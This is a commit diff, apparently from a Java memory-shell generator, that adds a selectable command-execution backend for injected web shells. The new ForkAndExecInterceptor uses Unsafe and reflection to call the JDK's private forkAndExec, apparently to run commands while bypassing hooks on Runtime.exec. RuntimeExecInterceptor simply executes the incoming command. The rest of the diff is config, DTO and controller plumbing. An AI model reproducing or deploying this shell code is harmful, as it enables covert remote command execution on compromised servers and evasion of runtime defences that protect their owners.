ReaJason
diff --git a/‎boot/build.gradle‎
Lines changed: 1 addition & 1 deletion b/‎boot/build.gradle‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎boot/src/main/java/com/reajason/javaweb/boot/controller/ConfigController.java‎
Lines changed: 7 additions & 3 deletions b/‎boot/src/main/java/com/reajason/javaweb/boot/controller/ConfigController.java‎
Lines changed: 7 additions & 3 deletions
diff --git a/‎boot/src/main/java/com/reajason/javaweb/boot/dto/GenerateRequest.java‎
Lines changed: 2 additions & 0 deletions b/‎boot/src/main/java/com/reajason/javaweb/boot/dto/GenerateRequest.java‎
Lines changed: 2 additions & 0 deletions
diff --git a/‎boot/src/main/java/com/reajason/javaweb/boot/vo/CommandConfigVO.java‎
Lines changed: 16 additions & 0 deletions b/‎boot/src/main/java/com/reajason/javaweb/boot/vo/CommandConfigVO.java‎
Lines changed: 16 additions & 0 deletions
diff --git a/‎generator/src/main/java/com/reajason/javaweb/memshell/config/CommandConfig.java‎
Lines changed: 15 additions & 0 deletions b/‎generator/src/main/java/com/reajason/javaweb/memshell/config/CommandConfig.java‎
Lines changed: 15 additions & 0 deletions
diff --git a/‎generator/src/main/java/com/reajason/javaweb/memshell/generator/command/CommandGenerator.java‎
Lines changed: 10 additions & 4 deletions b/‎generator/src/main/java/com/reajason/javaweb/memshell/generator/command/CommandGenerator.java‎
Lines changed: 10 additions & 4 deletions
diff --git a/‎generator/src/main/java/com/reajason/javaweb/memshell/generator/command/ForkAndExecInterceptor.java‎
Lines changed: 107 additions & 0 deletions b/‎generator/src/main/java/com/reajason/javaweb/memshell/generator/command/ForkAndExecInterceptor.java‎
Lines changed: 107 additions & 0 deletions
diff --git a/‎generator/src/main/java/com/reajason/javaweb/memshell/generator/command/RuntimeExecInterceptor.java‎
Lines changed: 17 additions & 0 deletions b/‎generator/src/main/java/com/reajason/javaweb/memshell/generator/command/RuntimeExecInterceptor.java‎
Lines changed: 17 additions & 0 deletions
@@ -48,7 +48,7 @@ dependencies {
     implementation('org.springframework.boot:spring-boot-starter-web') {
         exclude group: 'org.springframework.boot', module: 'spring-boot-starter-tomcat'
     }
-    implementation 'org.apache.commons:commons-lang3:3.+'
+    implementation 'org.apache.commons:commons-lang3:3.17.0'
     implementation 'org.springframework.boot:spring-boot-starter-undertow'
     compileOnly 'org.projectlombok:lombok'
     developmentOnly 'org.springframework.boot:spring-boot-devtools'
 
@@ -1,5 +1,6 @@
 package com.reajason.javaweb.boot.controller;
 
+import com.reajason.javaweb.boot.vo.CommandConfigVO;
 import com.reajason.javaweb.memshell.Packers;
 import com.reajason.javaweb.memshell.Server;
 import com.reajason.javaweb.memshell.ShellTool;
@@ -61,8 +62,11 @@ public List<String> getPackers() {
         return coreMap;
     }
 
-    @GetMapping("/command/encryptors")
-    public List<CommandConfig.Encryptor> getCommandEncryptors() {
-        return Arrays.stream(CommandConfig.Encryptor.values()).toList();
+    @GetMapping("/command/configs")
+    public CommandConfigVO getCommandConfigs() {
+        CommandConfigVO commandConfigVO = new CommandConfigVO();
+        commandConfigVO.setEncryptors(Arrays.stream(CommandConfig.Encryptor.values()).toList());
+        commandConfigVO.setImplementationClasses(Arrays.stream(CommandConfig.ImplementationClass.values()).toList());
+        return commandConfigVO;
     }
 }
@@ -29,6 +29,7 @@ static class ShellToolConfigDTO {
         private String headerValue;
         private String shellClassBase64;
         private String encryptor;
+        private String implementationClass;
     }
 
     public ShellToolConfig parseShellToolConfig() {
@@ -50,6 +51,7 @@ public ShellToolConfig parseShellToolConfig() {
                     .shellClassName(shellToolConfig.getShellClassName())
                     .paramName(StringUtils.defaultIfBlank(shellToolConfig.getCommandParamName(), CommonUtil.getRandomString(8)))
                     .encryptor(CommandConfig.Encryptor.fromString(shellToolConfig.getEncryptor()))
+                    .implementationClass(CommandConfig.ImplementationClass.fromString(shellToolConfig.getImplementationClass()))
                     .build();
             case Suo5 -> Suo5Config.builder()
                     .shellClassName(shellToolConfig.getShellClassName())
 
@@ -0,0 +1,16 @@
+package com.reajason.javaweb.boot.vo;
+
+import com.reajason.javaweb.memshell.config.CommandConfig;
+import lombok.Data;
+
+import java.util.List;
+
+/**
+ * @author ReaJason
+ * @since 2025/5/25
+ */
+@Data
+public class CommandConfigVO {
+    private List<CommandConfig.Encryptor> encryptors;
+    private List<CommandConfig.ImplementationClass> implementationClasses;
+}
@@ -20,6 +20,21 @@ public class CommandConfig extends ShellToolConfig {
     @Builder.Default
     private Encryptor encryptor = Encryptor.RAW;
 
+    @Builder.Default
+    private ImplementationClass implementationClass = ImplementationClass.RuntimeExec;
+
+
+    public enum ImplementationClass {
+        RuntimeExec, ForkAndExec;
+
+        public static ImplementationClass fromString(String encryptor) {
+            if (encryptor != null && encryptor.equals("ForkAndExec")) {
+                return ForkAndExec;
+            }
+            return RuntimeExec;
+        }
+    }
+
     public enum Encryptor {
         RAW, DOUBLE_BASE64;
 
 
@@ -1,8 +1,10 @@
 package com.reajason.javaweb.memshell.generator.command;
 
 import com.reajason.javaweb.ClassBytesShrink;
-import com.reajason.javaweb.buddy.*;
-import com.reajason.javaweb.memshell.ShellType;
+import com.reajason.javaweb.buddy.LogRemoveMethodVisitor;
+import com.reajason.javaweb.buddy.MethodCallReplaceVisitorWrapper;
+import com.reajason.javaweb.buddy.ServletRenameVisitorWrapper;
+import com.reajason.javaweb.buddy.TargetJreVersionVisitorWrapper;
 import com.reajason.javaweb.memshell.config.CommandConfig;
 import com.reajason.javaweb.memshell.config.ShellConfig;
 import com.reajason.javaweb.memshell.utils.ShellCommonUtil;
@@ -13,10 +15,8 @@
 import net.bytebuddy.description.modifier.Visibility;
 import net.bytebuddy.dynamic.DynamicType;
 import net.bytebuddy.implementation.FixedValue;
-import org.apache.commons.lang3.StringUtils;
 
 import java.util.Collections;
-import java.util.HashMap;
 
 import static net.bytebuddy.matcher.ElementMatchers.named;
 
@@ -68,6 +68,12 @@ public DynamicType.Builder<?> getBuilder() {
                     .visit(Advice.to(DoubleBase64ParamInterceptor.class).on(named("getParam")));
         }
 
+        if (CommandConfig.ImplementationClass.RuntimeExec.equals(commandConfig.getImplementationClass())) {
+            builder = builder.visit(Advice.to(RuntimeExecInterceptor.class).on(named("getInputStream")));
+        } else if (CommandConfig.ImplementationClass.ForkAndExec.equals(commandConfig.getImplementationClass())) {
+            builder = builder.visit(Advice.to(ForkAndExecInterceptor.class).on(named("getInputStream")));
+        }
+
         return builder;
     }
 
 
@@ -0,0 +1,107 @@
+package com.reajason.javaweb.memshell.generator.command;
+
+import net.bytebuddy.asm.Advice;
+import sun.misc.Unsafe;
+
+import java.io.IOException;
+import java.io.InputStream;
+import java.lang.reflect.Field;
+import java.lang.reflect.Method;
+
+/**
+ * @author ReaJason
+ * @since 2025/5/25
+ */
+public class ForkAndExecInterceptor {
+    @Advice.OnMethodExit
+    public static void enter(@Advice.Argument(value = 0) String cmd, @Advice.Return(readOnly = false) InputStream returnValue) throws IOException {
+        try {
+            String[] strs = cmd.split("\\s+");
+            Field theUnsafeField = Unsafe.class.getDeclaredField("theUnsafe");
+            theUnsafeField.setAccessible(true);
+            Unsafe unsafe = (Unsafe) theUnsafeField.get(null);
+
+            Class<?> processClass = null;
+
+            try {
+                processClass = Class.forName("java.lang.UNIXProcess");
+            } catch (ClassNotFoundException e) {
+                processClass = Class.forName("java.lang.ProcessImpl");
+            }
+            Object processObject = unsafe.allocateInstance(processClass);
+
+            byte[][] args = new byte[strs.length - 1][];
+            int size = args.length;
+
+            for (int i = 0; i < args.length; i++) {
+                args[i] = strs[i + 1].getBytes();
+                size += args[i].length;
+            }
+
+            byte[] argBlock = new byte[size];
+            int i = 0;
+
+            for (byte[] arg : args) {
+                System.arraycopy(arg, 0, argBlock, i, arg.length);
+                i += arg.length + 1;
+            }
+
+            int[] envc = new int[1];
+            int[] std_fds = new int[]{-1, -1, -1};
+            byte[] bytes = strs[0].getBytes();
+            byte[] result = new byte[bytes.length + 1];
+            System.arraycopy(bytes, 0,
+                    result, 0,
+                    bytes.length);
+            result[result.length - 1] = (byte) 0;
+            try {
+                Field helperpathField = processClass.getDeclaredField("helperpath");
+                helperpathField.setAccessible(true);
+                byte[] helperpathObject = (byte[]) helperpathField.get(processObject);
+
+                Field launchMechanismField = processClass.getDeclaredField("launchMechanism");
+                launchMechanismField.setAccessible(true);
+                Object launchMechanismObject = launchMechanismField.get(processObject);
+                int mode = 0;
+                try {
+                    Field value = launchMechanismObject.getClass().getDeclaredField("value");
+                    value.setAccessible(true);
+                    mode = (Integer) value.get(launchMechanismObject);
+                } catch (NoSuchFieldException e) {
+                    int ordinal = (Integer) launchMechanismObject.getClass().getMethod("ordinal").invoke(launchMechanismObject);
+                    mode = ordinal + 1;
+                }
+
+                Method forkMethod = processClass.getDeclaredMethod("forkAndExec", int.class, byte[].class, byte[].class, byte[].class, int.class,
+                        byte[].class, int.class, byte[].class, int[].class, boolean.class);
+                forkMethod.setAccessible(true);
+                forkMethod.invoke(processObject, mode, helperpathObject, result, argBlock, args.length,
+                        null, envc[0], null, std_fds, false);
+            } catch (NoSuchFieldException e) {
+                // JDK7
+                Method forkMethod = processClass.getDeclaredMethod("forkAndExec", byte[].class, byte[].class, int.class,
+                        byte[].class, int.class, byte[].class, int[].class, boolean.class);
+                forkMethod.setAccessible(true);
+                forkMethod.invoke(processObject, result, argBlock, args.length,
+                        null, envc[0], null, std_fds, false);
+            }
+
+            try {
+                Method initStreamsMethod = processClass.getDeclaredMethod("initStreams", int[].class);
+                initStreamsMethod.setAccessible(true);
+                initStreamsMethod.invoke(processObject, std_fds);
+            } catch (NoSuchMethodException e) {
+                // JDK11
+                Method initStreamsMethod = processClass.getDeclaredMethod("initStreams", int[].class, boolean.class);
+                initStreamsMethod.setAccessible(true);
+                initStreamsMethod.invoke(processObject, std_fds, false);
+            }
+
+            Method getInputStreamMethod = processClass.getMethod("getInputStream");
+            getInputStreamMethod.setAccessible(true);
+            returnValue = ((InputStream) getInputStreamMethod.invoke(processObject));
+        } catch (Throwable e) {
+            returnValue = Runtime.getRuntime().exec(cmd).getInputStream();
+        }
+    }
+}
@@ -0,0 +1,17 @@
+package com.reajason.javaweb.memshell.generator.command;
+
+import net.bytebuddy.asm.Advice;
+
+import java.io.IOException;
+import java.io.InputStream;
+
+/**
+ * @author ReaJason
+ * @since 2025/5/25
+ */
+public class RuntimeExecInterceptor {
+    @Advice.OnMethodExit
+    public static void enter(@Advice.Argument(value = 0) String cmd, @Advice.Return(readOnly = false) InputStream returnValue) throws IOException {
+        returnValue = Runtime.getRuntime().exec(cmd).getInputStream();
+    }
+}
Original file line number	Diff line number	Diff line change
`@@ -48,7 +48,7 @@ dependencies {`
`48`	`48`	`implementation('org.springframework.boot:spring-boot-starter-web') {`
`49`	`49`	`exclude group: 'org.springframework.boot', module: 'spring-boot-starter-tomcat'`
`50`	`50`	`}`
`51`		`- implementation 'org.apache.commons:commons-lang3:3.+'`
	`51`	`+ implementation 'org.apache.commons:commons-lang3:3.17.0'`
`52`	`52`	`implementation 'org.springframework.boot:spring-boot-starter-undertow'`
`53`	`53`	`compileOnly 'org.projectlombok:lombok'`
`54`	`54`	`developmentOnly 'org.springframework.boot:spring-boot-devtools'`
Original file line number	Diff line number	Diff line change
`@@ -1,5 +1,6 @@`
`1`	`1`	`package com.reajason.javaweb.boot.controller;`
`2`	`2`
	`3`	`+import com.reajason.javaweb.boot.vo.CommandConfigVO;`
`3`	`4`	`import com.reajason.javaweb.memshell.Packers;`
`4`	`5`	`import com.reajason.javaweb.memshell.Server;`
`5`	`6`	`import com.reajason.javaweb.memshell.ShellTool;`
`@@ -61,8 +62,11 @@ public List<String> getPackers() {`
`61`	`62`	`return coreMap;`
`62`	`63`	`}`
`63`	`64`
`64`		`- @GetMapping("/command/encryptors")`
`65`		`- public List<CommandConfig.Encryptor> getCommandEncryptors() {`
`66`		`- return Arrays.stream(CommandConfig.Encryptor.values()).toList();`
	`65`	`+ @GetMapping("/command/configs")`
	`66`	`+ public CommandConfigVO getCommandConfigs() {`
	`67`	`+ CommandConfigVO commandConfigVO = new CommandConfigVO();`
	`68`	`+ commandConfigVO.setEncryptors(Arrays.stream(CommandConfig.Encryptor.values()).toList());`
	`69`	`+ commandConfigVO.setImplementationClasses(Arrays.stream(CommandConfig.ImplementationClass.values()).toList());`
	`70`	`+ return commandConfigVO;`
`67`	`71`	`}`
`68`	`72`	`}`